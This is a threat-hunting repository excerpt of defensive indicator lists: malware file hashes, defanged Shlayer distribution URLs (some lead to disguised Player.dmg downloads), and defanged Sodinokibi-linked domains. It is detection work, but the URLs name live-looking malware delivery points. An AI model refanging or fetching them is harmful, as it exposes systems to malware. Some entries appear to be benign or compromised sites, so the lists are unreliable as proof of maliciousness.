 89 | Exectable,a1b4c2b6f0311b510119b8b7d5394cb63ee5a983588462c1e798eb9f3471687b
 90 | Exectable,a2715f4fe971766681c17ccd0e045f87f7b09d4d57adb99601078ea5c8bbf68a
 91 | Exectable,a2fbf151010d614ac772d2232e94faf278f2ad9f650197987a0e2a4df2cc892e
 92 | Exectable,a389e24bf0af9bc81b8133a600a2b6c875d32aa0885964d0b9f3ac6db5fee762
 93 | Exectable,a6c1dba2085634d0a104551cbdb41f6652dc8a7aba9a40be094e971e310f38a1
 94 | Exectable,a6e3d32365196d053a488d68d00adab68f4953956fdb1fe0cc5915a0c4848e14
 95 | Exectable,a88e2857a2f3922b44247316642f08ba8665185297e3cd958bbd22a83f380feb
 96 | Exectable,a8928d557eccde515b1acd7e326d073684690d4bd7538b6842f0f4c48120d984
 97 | Exectable,a8d1d6cf7e591719401df17979782244d70dbf59823c889f5329e1f2bcfca1e1
 98 | Exectable,ac3e29e3c35138e857bffbc8cf5f8414b71c5694e7e13abe59620d2bde408887
 99 | Exectable,add230a2e7aabf2ea909f641894d9febc6673cf23623a00ce3f47bc73ec9b310
100 | Exectable,b202927e24727ac2677f9635dc7bcfab8e812b3f74f85d40f198642d182d671c
101 | Exectable,b4436606c93ae464876a0e229342503cf754d9951d61d9e2e3fcbdf680fdffc4
102 | Exectable,b6a2162e86dbf9d501555377a6262ba63f5d1ff87d47a284ba3e8a9d7ef26cc9
103 | Exectable,b6e27e49d83f82f0feaa1b41d7b8906b9237e08968bb2cd5ae6f4f97b4c9f5c8
104 | Exectable,bbca6188aac86332e90673e663f91f3097a63153835b4f9d058e90baf075012a
105 | Exectable,bd4bcc8cb3e33c018a4d9037bf5cf9bd6f7ce0a5c4b862e94c098366004563d4
106 | Exectable,c407c0db2f79f607dfdc5eb2f4f222491f96ea3540d8689c8ed6fba89a240757
107 | Exectable,c6d72dbc8c2ca62471a786a4a00e771d8683a7c7429d2c67f059315cd6ad443d
108 | Exectable,c73116292f7373e4271d58b48fbc64fa031c8c2c5da8745a64e86d4625ff54ac
109 | Exectable,d011469083d12ad3d94925dbcf113136039a5b53d70e0f99ff04267a4bf80b6d
110 | Exectable,d4e89180e559721e6bcd9c03549d540282c3774bdd6ae61a61d57a23c10fc299
111 | Exectable,de0b6c17c7c921fc515bbdb7ed2fdc1f1069860cfe2b611c105201a916d0e87d
112 | Exectable,e281347d6faf8fa17e9bcd79d0f815187506c89e8bca9ffae78170e31ff07438
113 | Exectable,e5a9e0e9eaa33ce2ac37af1894986b5378267bd98148f2fdb762ef627dded3f5
114 | Exectable,e630185053ee119ac973aa341c74fb1a9006b7f1a58e9f4c47efb1da9dd7bc0c
115 | Exectable,e713e3f1e74df404568466e88dbfa1be33c917472830cdb54ce803dfa8ec3ff0
116 | Exectable,e7ddb20095cd733efc10fba3ff1a8b3e83767cc900b5a976d4029456226612b0
117 | Exectable,eb486e276b6fb580c58508d71d303b0535970ac243021eeede55bcd253f114cf
118 | Exectable,f0c60f62ef9ffc044d0b4aeb8cc26b971236f24a2611cb1be09ff4845c3841bc
119 | Exectable,f195fb77843e110ff91656c09d277563ee32c2d36388e556f25328bf0aac80be
120 | Exectable,f1bc14943c240f59b8d3ad4d6e3ad5568f896f80e79697e690612c5602fa653d
121 | Exectable,f92933369385d3e441642b60857a102b91738351630a10bb4194cb1ed65793b7
122 | Exectable,fac5d96467b6b9725b412d3b78eb52e3fa71be748579896774df3f86be1fba4e
123 | Exectable,fdddbbc09972a8da879209f8b45796b4343ffd8c74ae8e56bfe78aebc710777b
124 | Exectable,ff61085ff157ef0a98ab65a5343e65637ee24e12cac3b418e45532fc2747f3e5


--------------------------------------------------------------------------------
/threat_hunting/IOCs/shlayer/urls-iocs.txt:
--------------------------------------------------------------------------------
 1 | hxxps://24upgradecheck.thereadyforsafestubs.icu/?b9zd1=aFDEo1W3qcjpym4Vud7AWjxq5TSBvQ8LDzjFhQ9_9uQ7DDCv9dCF5WJqBQw5tp8k6g3vmerTQej-4gA8X3isdw..&cid=wCG0N3B3JD1OT1FJH254GM70&sid=0a8908b6-2b52-4afe-b03e-dd688c4c24b2wCG0N3B3JD1OT1FJH254GM70&v_id=4y-JnFdiMbl-dy50dAv8IEj0EXY_sOm3KELfQq7PMwY.
 2 | hxxps://downgradepc.bestcenter2content.icu/?b9zd1=OsxhHHpfuZ5A0uBdynRb_HEDW03owLLRl5HsGZve18tDgSqznaod6_zryM2Obes9tnv9ToNtLNkoYXKe1ENzzw..&cid=w6E699STI663U1FJHJVI7B76&sid=110&v_id=s0h6zR5YwfnmOijrBEeaE7KjfOpDfVOBXRl7zlF6I4U.
 3 | hxxps://s3.amazonaws.com/105c1a1d-7c52-4137-81b5-33bd4b/71cf5b5/uz_9PWQ6Zk_gwBd/10A5283C825AF5?clickid=5c318d5e7edb2300011ce38f&source=2204247-2418579306-0&k=e241fe4b-14f3-e811-81f7-ed46f4389d4a&s=2b4ac251-6031-4104-aeb0-f3e93ae2e8b5&client=chrome&st=aHR0cDovL3d3dy5wcm9jZXNzYnJvd3Nlci5jb20%253d&h=VhNARxcDEgEFBxQcAgIYCQVnBwcXAQoJAQ8eBQMEHAgGAhgJCAkFBg8dEFpFGwoCBAUYBgAFBQEEHxdVDwsQVgcNAVVQAk8cAwdTCh1WDQccHAoCUw4dVlECG1cGAA0AVAdUFAETXkNRGwoRXUJZQUEJGhZDABtXQFBIXFtYR0AbVUJcEB8XSlcRD1hYXV4fF0lTWhcMHAMLABkbU1dFFBdFQEZQRA%253D%253D&a=1&u=aHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tLzYyN2UvMTAzMS9QbGF5ZXIuZG1nP2NsaWNraWQ9NWMzMThkNWU3ZWRiMjMwMDAxMWNlMzhmJnNvdXJjZT0yMjA0MjQ3LTI0MTg1NzkzMDYtMCZrPWUyNDFmZTRiLTE0ZjMtZTgxMS04MWY3LWVkNDZmNDM4OWQ0YSZzPTJiNGFjMjUxLTYwMzEtNDEwNC1hZWIwLWYzZTkzYWUyZThiNSZjbGllbnQ9Y2hyb21lJnN0PWFIUjBjRG92TDNkM2R5NXdjbTlqWlhOelluSnZkM05sY2k1amIyMCUyNTNk
 4 | hxxp://upgradebestfreshtheclicks.icu/BIOZ122zO_2aIvtT8lJzim7Yh2pLttnyXVjG3av5hnA?clck=[CLICK_ID]&sid=11271
 5 | hxxp://192.168.42.1/blocking.asp?cat_id=94&mac=C4B301C64CB7&domain=tracking.marketing
 6 | hxxp://get.securybrowse.com/view/item_48575.html
 7 | hxxps://app4com.thereadyforsafestubs.icu/?b9zd1=aFDEo1W3qcjpym4Vud7AWjxq5TSBvQ8LDzjFhQ9_9uQHJCnlcQoYFXlJ-PHYnPWK20VtkaLUxUgKtNqiSCKzsQ..&cid=wQCLFRLQDTRLUFFJHH72R21O&sid=0a8908b6-2b52-4afe-b03e-dd688c4c24b2wQCLFRLQDTRLUFFJHH72R21O&v_id=PcifU2ZpTCdGvVQF62fxVeMo69kMeQajZNtIs04XN1M.
 8 | hxxps://app4com.thereadyforsafestubs.icu/?b9zd1=aFDEo1W3qcjpym4Vud7AWjxq5TSBvQ8LDzjFhQ9_9uTepszPvMPplvVjJ7lYHL1DNW40vAynjyFu9TY1pS5WXw..&cid=wGCFJEG97LM91FFJHCH3SSVQ&sid=2cd1ea47-5c41-4893-85dc-43d29e262c7ewGCFJEG97LM91FFJHCH3SSVQ&v_id=tIXi7SMa3hM81omFx5_xeZ9_G9hh8KSw2Iup8hJk0lQ.
 9 | hxxp://kasefe.otlu.pw/AwFPBpuRBaJnoGv3Aw7-yWTsmWfsRH5JbzbI6r7qmtD29N5VjFf61QZF-p0-PZeKpb8ORNykk0aCs0ROQBintTL6PJFBop5veki32xTScj26Uw==?ci=084988483069593011744&n3er=2NDK4Q==&uu=lIaJhrzOpHZ6hHt8fnaHdX17hXk=
10 | hxxp://wpdtk.tribunebegin.pw/hyllkjit/97a8398c/?n=142335492
11 | hxxp://wpdtk.tribunebegin.pw/hyllkjit/fa33e00e/?n=629336344
12 | hxxp://wpdtk.tribunebegin.pw/hyllkjit/8e97253a/?n=1859276224
13 | hxxp://wpdtk.tribunebegin.pw/hyllkjit/81fcb0a5/?n=1687669274
14 | hxxp://www.apple.com-care-macbook-system.live/scan-mac/?campid=7d2a330e-b271-4b51-a858-19fed1758b72&model=Desktop&os=MacOS%2010.14%20Mojave&city=Alajuela&zn=whiskey-pah-4OqwzOVW&sc=f1be0f9b-24b9-4ef6-b115-1b6525e2d391&ip=179.48.251.227&ua=Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_14_1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F71.0.3578.98%20Safari%2F537.36&browser=Chrome&browserversion=Chrome%2071&language=en&connection=BROADBAND&isp=Data%20Miners%20s.a.%20Racknation.Cr&carrier=&cep=IQcNp60p6A8YyPtQkWrq4Uy9MtfwCyDpEdsKN3xizE1g6sNtNpRaQg4zF5g0z_ZV72jTZyzRksNs5IJNmwMX8XoRm77SxEBUia93oQkEl6yzBzOgqQC3ZcSQzlqXXuAc8eQ_1i1Sjhjz46mXYXs2r_b3YxQ__LnnVqnsyIU8mEZjmVjxBKGIE-hdItjq5fuyGNxz1T2-u6vDIxYE1rjzBiYGNAC_arXM22tO2DYA0fNFLPhu0TpswdYaRq_zP_joByrqi4v03bzrmkgtMySDxTtyw0nUXnV6GDqOuU_WTTFwFyFAYa-9fvAZkAKD3BjtkJM8VpliNif5-j8fcANjdX7P4_VqtvcUd6d12kfxCk7ShspWzR8B9EsHOn-_7dEt6RWxZFd_at_1eHGvBnMwxQNmlR20LxFZr4NNZUsFur4
15 | hxxp://pxesa.peoplefrozen.pw/hyllkjit/81fcb0a5/?n=1283223056
16 | hxxp://pxesa.peoplefrozen.pw/hyllkjit/fa33e00e/?n=1848654186
17 | hxxp://nkejt.spoonwolf.pw/hyllkjit/97a8398c/?n=631789859
18 | hxxp://rlksl.dealrudolf.pw/hyllkjit/18faf9c7/?n=1853815040
19 | hxxp://rlksl.dealrudolf.pw/hyllkjit/fa33e00e/?n=72922860
20 | hxxp://rlksl.dealrudolf.pw/hyllkjit/8e97253a/?n=407005707
21 | hxxp://rlksl.dealrudolf.pw/hyllkjit/81fcb0a5/?n=126676016
22 | hxxp://rlksl.dealrudolf.pw/hyllkjit/6de876a5/?n=823754231
23 | hxxps://downgradepc.bestcenter2content.icu/?b9zd1=OsxhHHpfuZ5A0uBdynRb_HEDW03owLLRl5HsGZve18tDgSqznaod6_zryM2Obes9tnv9ToNtLNkoYXKe1ENzzw..&cid=w8QV18HD2OT9VLFJHDUEV228&sid=110&v_id=u3wizH59RPW-WVlPdyhz1ravNQoJ-g_TWt_FKcX_Smc.
24 | hxxp://www.logicalhandler.com/7GI8ktQ5XrElFcxdsMEiNbxkblu?clickid=5c3240dc3aa22300012f87ad&source=46&r=650cf2f3-51f4-e711-a367-f7801280a94b&s=4e94a3c5-be40-47b9-a4e7-643d4fc45168&client=chrome&kd=aHR0cDovL3d3dy5sb2dpY2FsaGFuZGxlci5jb20%253d&h=VhNARxcDEgEFBxQcAgIYCQZnBQ8XBAYJBg4eAAIPFQQHBhgJCAkFBg8dEFpFGwoCAAIdAgEFAgkIHxdVDwsQBQAJU1UHUB4cBwJTDR1WAgccHFMAAw4dVQIOHQAACwVYCQdXFAETXkNRGwoRXUJZQQgcGk5HRBtaQlZbUFRVWFJbUkFUQB1WVl0RGRReVhAJW0xcXxkUXVJbEQ8IAAsZFE5VQhEPTUJGUEs%253D&a=1&u=aHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL2I4MjM5OWExLTI3LzIwNjU1YjNjLTFmYjYtNGNkNS1iNzVjLTdmYTAvMWUyNmZkYjUtMjMzMS00Y2I3LTk2Y2UtNWExYi9QbGF5ZXIuZG1nP2NsaWNraWQ9NWMzMjQwZGMzYWEyMjMwMDAxMmY4N2FkJnNvdXJjZT00NiZyPTY1MGNmMmYzLTUxZjQtZTcxMS1hMzY3LWY3ODAxMjgwYTk0YiZzPTRlOTRhM2M1LWJlNDAtNDdiOS1hNGU3LTY0M2Q0ZmM0NTE2OCZjbGllbnQ9Y2hyb21lJmtkPWFIUjBjRG92TDNkM2R5NXNiMmRwWTJGc2FHRnVaR3hsY2k1amIyMCUyNTNk
25 | hxxp://www.enginetransaction.com/jy5exV3z6XH3dnB?clickid=5c3241393aa22300012fb8db&source=46&r=650cf2f3-51f4-e711-a367-f7801280a94b&s=f3134dfa-5635-4977-b79c-941c59c10fde&client=chrome&kd=aHR0cDovL3d3dy5lbmdpbmV0cmFuc2FjdGlvbi5jb20%253d&h=VhNARxcDEgEFBxQcAgIYCQZnBQ8XBAQJBAkeBQ0BGwUAARgJCAkFBg8dEFpFGwoCAAIdAgEFAgkIHxdVDwsQBQAJU1UHUB4cBwJTDR1WAgccHFMAAw4dVQIOHQAACwVYCQdXFAETXkNRGwoRXUJZQQgcGk5HRBtTQ1ZbXVBNQlJbRUxSRlpaVx5QWlsPHRBAUhsKXUBaQR0QQ1ZQEgkEBhUdEFBRSRIJQURYVE8%253D&x=1&u=aHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL2I4MjM5OWExLTI3LzIwNjU1YjNjLTFmYjYtNGNkNS1iNzVjLTdmYTAvMWUyNmZkYjUtMjMzMS00Y2I3LTk2Y2UtNWExYi9QbGF5ZXIuZG1nP2NsaWNraWQ9NWMzMjQxMzkzYWEyMjMwMDAxMmZiOGRiJnNvdXJjZT00NiZyPTY1MGNmMmYzLTUxZjQtZTcxMS1hMzY3LWY3ODAxMjgwYTk0YiZzPWYzMTM0ZGZhLTU2MzUtNDk3Ny1iNzljLTk0MWM1OWMxMGZkZSZjbGllbnQ9Y2hyb21lJmtkPWFIUjBjRG92TDNkM2R5NWxibWRwYm1WMGNtRnVjMkZqZEdsdmJpNWpiMjAlMjUzZA%3d%3d
26 | hxxp://www.logicalhandler.com/7GI8ktQ5XrElFcxdsMEiNbxkblu?clickid=5c3240dc3aa22300012f87ad&source=46&r=650cf2f3-51f4-e711-a367-f7801280a94b&s=4e94a3c5-be40-47b9-a4e7-643d4fc45168&client=chrome&kd=aHR0cDovL3d3dy5sb2dpY2FsaGFuZGxlci5jb20%253d&h=VhNARxcDEgEFBxQcAgIYCQZnBQ8XBAYJBg4eAAIPFQQHBhgJCAkFBg8dEFpFGwoCAAIdAgEFAgkIHxdVDwsQBQAJU1UHUB4cBwJTDR1WAgccHFMAAw4dVQIOHQAACwVYCQdXFAETXkNRGwoRXUJZQQgcGk5HRBtaQlZbUFRVWFJbUkFUQB1WVl0RGRReVhAJW0xcXxkUXVJbEQ8IAAsZFE5VQhEPTUJGUEs%253D&a=1&u=aHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL2I4MjM5OWExLTI3LzIwNjU1YjNjLTFmYjYtNGNkNS1iNzVjLTdmYTAvMWUyNmZkYjUtMjMzMS00Y2I3LTk2Y2UtNWExYi9QbGF5ZXIuZG1nP2NsaWNraWQ9NWMzMjQwZGMzYWEyMjMwMDAxMmY4N2FkJnNvdXJjZT00NiZyPTY1MGNmMmYzLTUxZjQtZTcxMS1hMzY3LWY3ODAxMjgwYTk0YiZzPTRlOTRhM2M1LWJlNDAtNDdiOS1hNGU3LTY0M2Q0ZmM0NTE2OCZjbGllbnQ9Y2hyb21lJmtkPWFIUjBjRG92TDNkM2R5NXNiMmRwWTJGc2FHRnVaR3hsY2k1amIyMCUyNTNk
27 | hxxps://s3.amazonaws.com/201842/2132/4_GiRHcDIkyMVwj7RMtz/o5Ed45?cid=zr0629a0f5241711e9babc0a436f77c5728250625bbbdb4c2c9bc0bd7e411b6a520357585400e8db48fe&source=whiskey-pah-4OqwzOVW&c=05212224-fa17-e911-81f7-ed46f4389d4a&s=0a9c8e8e-8515-46f7-994e-1ffb30a23342&client=chrome&st=aHR0cDovL3d3dy5kaXNwbGF5dXBkYXRlci5jb20%253d&h=VhNARxcDEgEFBxQcAgIYCwlnBAIXBQMJBgoeAgMEHAUABRgJCAkFBg8dEFpFGwoBAwIfBAYGAwwAHxdVDwsQAwALAQEHBBkcVFIEDh1WDAccHAoCUw4dVlECG1cGAA0AVAdUFAETXkNRGwoRXUJZQUEJGhZDABtXQFBIXFtYR0AbVUJcEB8XSlcRD1hYXV4fF0lTWhcMGwEFHxdaVEMXDFlDR1ZI&e=1&u=aHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tLzEyMzQ4NzEvNDIyMTI0YWItMzE2Mi00ZGI5LTliMTMtM2Q3L1BsYXllci5kbWc%2fY2lkPXpyMDYyOWEwZjUyNDE3MTFlOWJhYmMwYTQzNmY3N2M1NzI4MjUwNjI1YmJiZGI0YzJjOWJjMGJkN2U0MTFiNmE1MjAzNTc1ODU0MDBlOGRiNDhmZSZzb3VyY2U9d2hpc2tleS1wYWgtNE9xd3pPVlcmYz0wNTIxMjIyNC1mYTE3LWU5MTEtODFmNy1lZDQ2ZjQzODlkNGEmcz0wYTljOGU4ZS04NTE1LTQ2ZjctOTk0ZS0xZmZiMzBhMjMzNDImY2xpZW50PWNocm9tZSZzdD1hSFIwY0RvdkwzZDNkeTVrYVhOd2JHRjVkWEJrWVhSbGNpNWpiMjAlMjUzZA%3d%3d
28 | hxxps://www.realtor.com/apartments/Longmont_CO?cid=dsp_uu_amp_rentals_srp_ron&content_id=amp1548803098010300000
29 | hxxp://mixtypecloudtheclicks.icu/sirANW0H-2OMo16FohcSS02K0yLQUuGkTvPBLRkNx9o?cid=wHT9FTI9MVF95V0K1BGL3VKI&sid=110
30 | hxxps://nowversion.thebeststubcontentingfrees.icu/?b9zd1=aFDEo1W3qcjpym4Vud7AWjxq5TSBvQ8LDzjFhQ9_9uRyRJiajHz1hMDtR-iRj5ufL6rWgkd_gQ2bJxg6fckJbw..&cid=wNOGS1PMQ01VBV0K1DP50OF2&sid=adr-0a8908b6-2b52-4afe-b03e-dd688c4c24b2&v_id=7ZuztumcaV0hCIw_ZYmfmm7WS4ikJ3qEBrxlg5gik2A.
31 | hxxps://s3.amazonaws.com/17154/j7bpR4t5AEGcg/nxZC/j6pNI?cid=zr21b1bf21243e11e9833a0ab01d201722d65823a254ab46bda4ffdc1f94dc60f90357634d19206c4a5f&source=whiskey-pah-4OqwzOVW&r=25271001-be68-e811-81f7-ed46f4389d4a&s=f75758c7-ff77-455a-999a-34e03e6041f1&client=chrome&rsm=aHR0cDovL3d3dy5wcm90b2NvbGFkbWluLmNvbQ%253d%253d&h=VhdLQxoLGwoGBBQYCQYVAwBsBwwXBwgNCwAXCAEBHQUBARUBAQIGBQ8ZG15IEwMNBAUUDA0ACAUVGlUXFxcLAgoGCAgGBABXXAEAHFwABwQADQhRDxxcXAIDSwEKDwFVDVkUGQ9ZSVMaCxtQQkFdRgMYF0IKFldYTE9WWVlGShZVWkAXFRVLVhsCWEBBWRUVSFJQGgwNHAYVFVtVSRoMQV9AXEo%253D&a=1&u=aHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tLzE1MTkvNDU1NzQvNTcwNDEvUGxheWVyLmRtZz9jaWQ9enIyMWIxYmYyMTI0M2UxMWU5ODMzYTBhYjAxZDIwMTcyMmQ2NTgyM2EyNTRhYjQ2YmRhNGZmZGMxZjk0ZGM2MGY5MDM1NzYzNGQxOTIwNmM0YTVmJnNvdXJjZT13aGlza2V5LXBhaC00T3F3ek9WVyZyPTI1MjcxMDAxLWJlNjgtZTgxMS04MWY3LWVkNDZmNDM4OWQ0YSZzPWY3NTc1OGM3LWZmNzctNDU1YS05OTlhLTM0ZTAzZTYwNDFmMSZjbGllbnQ9Y2hyb21lJnJzbT1hSFIwY0RvdkwzZDNkeTV3Y205MGIyTnZiR0ZrYldsdUxtTnZiUSUyNTNkJTI1M2Q%3d
32 | hxxps://s3.amazonaws.com/7fcf0762-4689-42fd/t9_p_fVcDUWb/gBpa/ef44?cid=zr29cf36e6244511e982e912a18e02c6d22187612062ce4032835d968a36071216035764dd51886171fd&source=whiskey-pah-4OqwzOVW&r=25271001-be68-e811-81f7-ed46f4389d4a&s=40c61f36-71b7-41b1-917e-dc60a1c8ddba&client=chrome&kd=aHR0cDovL3d3dy5wcm90b2NvbGFkbWluLmNvbQ%253d%253d&h=VhdLQxoLGwoGBBQYCQYVAwBsBAUXBAgNDQAXDQYDHwABBBUBAQIGBQ8ZG15IEwMJBQ0fAQsGCwELFBRWDw8bBQ0DDgkGBRwYW1IOCRRdDgQcGAEGXgYUXVIBG1MNBAAIXQxXFwEXVUdcEwMaXkFZRUoNFx5KCxhUQFRDWFZQTksYVkJYGxsaQl4aDFtYWVUbGkFaURQPFQQKGxpSXUgUD1lHTFJF&x=1&u=aHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL2YxMDQ5ZWQzLWM3OWQtNDM3NS1hZjUvRjdDQi8yNDBBL1BsYXllci5kbWc%2fY2lkPXpyMjljZjM2ZTYyNDQ1MTFlOTgyZTkxMmExOGUwMmM2ZDIyMTg3NjEyMDYyY2U0MDMyODM1ZDk2OGEzNjA3MTIxNjAzNTc2NGRkNTE4ODYxNzFmZCZzb3VyY2U9d2hpc2tleS1wYWgtNE9xd3pPVlcmcj0yNTI3MTAwMS1iZTY4LWU4MTEtODFmNy1lZDQ2ZjQzODlkNGEmcz00MGM2MWYzNi03MWI3LTQxYjEtOTE3ZS1kYzYwYTFjOGRkYmEmY2xpZW50PWNocm9tZSZrZD1hSFIwY0RvdkwzZDNkeTV3Y205MGIyTnZiR0ZrYldsdUxtTnZiUSUyNTNkJTI1M2Q%3d
33 | hxxps://s3.amazonaws.com/19e69f51-16/NYNw/A691/4556?cid=zr5e2ac0d7251211e9b25412b4464a265e5936a4406f5e410b9917b3830a67911b0357888ee307a2abf0&source=whiskey-pah-4OqwzOVW&r=25271001-be68-e811-81f7-ed46f4389d4a&s=5b8afe22-d692-4959-a8cb-a9274f27e314&client=chrome&kd=aHR0cDovL3d3dy5wcm90b2NvbGFkbWluLmNvbQ%253d%253d&h=VhdLQxoLGwoGBBQYCQYVAglsBAUXAQkNDAQXDAMHGgEIGggJAwgGFwEXUEcaCwwKBgwUAQ4HDB0bWxQPDwcMBQ8ACQgHGE9QDw8VVAEJBxgVBF8AFVRdDABTGQYBDlwFWBoaF0FFXRUCE1FMQkVeDxYYSwIXWVtUV1pXVk9CF1tZWA8ZG0RfEwNWQ1lBGRtHW1gbAg4EHhkbVFxBGwJCR1hQRA%253D%253D&t=1&u=aHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3Y0cDVvcnYvNjY2MS8xNTQxL1BsYXllci5kbWc%2fY2lkPXpyNWUyYWMwZDcyNTEyMTFlOWIyNTQxMmI0NDY0YTI2NWU1OTM2YTQ0MDZmNWU0MTBiOTkxN2IzODMwYTY3OTExYjAzNTc4ODhlZTMwN2EyYWJmMCZzb3VyY2U9d2hpc2tleS1wYWgtNE9xd3pPVlcmcj0yNTI3MTAwMS1iZTY4LWU4MTEtODFmNy1lZDQ2ZjQzODlkNGEmcz01YjhhZmUyMi1kNjkyLTQ5NTktYThjYi1hOTI3NGYyN2UzMTQmY2xpZW50PWNocm9tZSZrZD1hSFIwY0RvdkwzZDNkeTV3Y205MGIyTnZiR0ZrYldsdUxtTnZiUSUyNTNkJTI1M2Q%3d
34 | hxxps://noteupgrade.freeandgreatappsite.icu/?b9zd1=aFDEo1W3qcjpym4Vud7AWjxq5TSBvQ8LDzjFhQ9_9uT484-tX24lKkBrLUskBAz74nF6jyLy6Gbsnec9A0U__g..&cid=w5O5LCU2181E5S1K1AQQMRKI&sid=adr-5a0295df-c96e-4067-97e9-384f9ea541df&v_id=AYMw58RlV80oBMHRI5NxPj_Ft1IXRXpV9yLFsoCm4tM.
35 | hxxps://readyupdate.freeandgreatappsite.icu/?b9zd1=aFDEo1W3qcjpym4Vud7AWjxq5TSBvQ8LDzjFhQ9_9uRpuOC2AGugyGOKprT0RwYwpe7qs_cN2ghLjd9fk65Rog..&cid=wDSMIEMKF1OQCS1KHOFDJU9U&sid=adr-5a0295df-c96e-4067-97e9-384f9ea541df&v_id=ViU3Thgnoqey0Iq8Fhzv9HeZvqluKvWWF-WfJjbznQA.
36 | hxxps://s3.amazonaws.com/88ed85e4-f7a1-4a8d-acb0-6109947e425/FA6C9477CC3A6B4AA2/127169/H8T9WJ_l?cid=w704NEBF6146J86K19JU681L&fn=your_file_1549412564120&source=340&c=710216a0-c59b-e811-81f7-ed46f4389d4a&s=845983c0-f323-44ca-b647-5e7fec3cd7d8&client=chrome&st=aHR0cDovL3d3dy51cGdyYWRlbW9kdWxlLmNvbQ%253d%253d&h=VhdLQxoLGwoGBBQYCQUVAQxsBwMXBwsNDAQXDwEEGgENBBUBAQIGBQ8ZG15IEwMLAg0YBw4AAAEPFBRWDw8bAAkBCwkAVB0YWgIBUxRdDgQcGAEGXgYUXVIBG1MNBAAIXQxXFwEXVUdcEwMaXkFZRUoNFx5KCxhUQFRDWFZQTksYVkJYGxsaQl4aDFtYWVUbGkFaURQPFAMPGxpSXUgUD1lHTFJF&e=1&u=aHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tLzdmNTljMDlmLTNjMTgtNDFlMy05ZDhmLWVkZDBhMC9fUTk2L3lvdXJfZmlsZV8xNTQ5NDEyNTY0MTIwLmRtZz9jaWQ9dzcwNE5FQkY2MTQ2Sjg2SzE5SlU2ODFMJmZuPXlvdXJfZmlsZV8xNTQ5NDEyNTY0MTIwJnNvdXJjZT0zNDAmYz03MTAyMTZhMC1jNTliLWU4MTEtODFmNy1lZDQ2ZjQzODlkNGEmcz04NDU5ODNjMC1mMzIzLTQ0Y2EtYjY0Ny01ZTdmZWMzY2Q3ZDgmY2xpZW50PWNocm9tZSZzdD1hSFIwY0RvdkwzZDNkeTUxY0dkeVlXUmxiVzlrZFd4bExtTnZiUSUyNTNkJTI1M2Q%3d
37 | hxxp://mixtypedowngradetheclicks.icu/MyWV7jx0rr46AURogK5cLOzKvNbFgNNdxtdRobUeOe4?sid=222857&clck=2525703377
38 | 


--------------------------------------------------------------------------------
/threat_hunting/IOCs/IOCs_2019_Q3_Sodinokibi-Domains.csv:
--------------------------------------------------------------------------------
  1 | 11[.]in[.]ua
  2 | 111firstdelray[.]com
  3 | 1deals[.]com
  4 | 2020hindsight[.]info
  5 | 5thactors[.]com
  6 | 90nguyentuan[.]com
  7 | 9nar[.]com
  8 | a-zpaperwork[.]eu
  9 | abulanov[.]com
 10 | acb-gruppe[.]ch
 11 | achetrabalhos[.]com
 12 | acibademmobil[.]com[.]tr
 13 | acornishstudio[.]co[.]uk
 14 | adedesign[.]com
 15 | advance-refle[.]com
 16 | advanced-removals[.]co[.]uk
 17 | advancedeyecare[.]com
 18 | advesa[.]com
 19 | affligemsehondenschool[.]be
 20 | agendatwentytwenty[.]com
 21 | agora-collectivites[.]com
 22 | agrifarm[.]dk
 23 | ahgarage[.]com
 24 | aidanpublishing[.]co[.]uk
 25 | airserviceunlimited[.]com
 26 | airvapourbarrier[.]com
 27 | alaskaremote[.]com
 28 | alattekniksipil[.]com
 29 | alexwenzel[.]de
 30 | alisodentalcare[.]com
 31 | allinonecampaign[.]com
 32 | alltagsrassismus-entknoten[.]de
 33 | alnectus[.]com
 34 | altitudeboise[.]com
 35 | alwaysdc[.]com
 36 | amco[.]net[.]au
 37 | anchelor[.]com
 38 | andermattswisswatches[.]ch
 39 | andrealuchesi[.]it
 40 | andreaskildegaard[.]dk
 41 | angelika-schwarz[.]com
 42 | angelsmirrorus[.]com
 43 | animation-pro[.]co[.]uk
 44 | anleggsregisteret[.]no
 45 | annenymus[.]com
 46 | annida[.]it
 47 | antesacademy[.]it
 48 | apiarista[.]de
 49 | apmollerpension[.]com
 50 | apogeeconseils[.]fr
 51 | aquacheck[.]co[.]za
 52 | arabianmice[.]com
 53 | arearugcleaningnyc[.]com
 54 | arthakapitalforvaltning[.]dk
 55 | artvark[.]nl
 56 | atelierkomon[.]com
 57 | atrgroup[.]it
 58 | augen-praxisklinik-rostock[.]de
 59 | auto-opel[.]ro
 60 | avisioninthedesert[.]com
 61 | awaisghauri[.]com
 62 | axisoflove[.]org
 63 | ayudaespiritualtamara[.]com
 64 | b3b[.]ch
 65 | babysitting-hk[.]helpergo[.]co
 66 | bagaholics[.]in
 67 | baikalflot[.]ru
 68 | baita[.]ac
 69 | bajova[.]sk
 70 | bakingismyyoga[.]com
 71 | banksrl[.]co[.]za
 72 | banukumbak[.]com
 73 | baptistdistinctives[.]org
 74 | barbaramcfadyenjewelry[.]com
 75 | baumfinancialservices[.]com
 76 | bavovrienden[.]nl
 77 | bcmets[.]info
 78 | beandrivingschool[.]com[.]au
 79 | beauty-traveller[.]com
 80 | belinda[.]af
 81 | bellesiniacademy[.]org
 82 | benchbiz[.]com
 83 | bertbutter[.]nl
 84 | bescomedical[.]de
 85 | bg[.]szczecin[.]pl
 86 | biblica[.]com
 87 | biketruck[.]de
 88 | bilius[.]dk
 89 | billigeflybilletter[.]dk
 90 | billyoart[.]com
 91 | biodentify[.]ai
 92 | birthplacemag[.]com
 93 | bjornvanvulpen[.]nl
 94 | blavait[.]fr
 95 | block-optic[.]com
 96 | blucamp[.]com
 97 | bluelakevision[.]com
 98 | bluetenreich-brilon[.]de
 99 | bmw-i-pure-impulse[.]com
100 | bodet150ans[.]com
101 | boloria[.]de
102 | bookingwheel[.]com
103 | bratek-immobilien[.]de
104 | breakluckrecords[.]com
105 | brighthillgroup[.]com
106 | bringmehope[.]org
107 | broccolisoep[.]nl
108 | brownswoodblog[.]com
109 | brunoimmobilier[.]com
110 | buffdaddyblog[.]com
111 | bumbipdeco[.]site
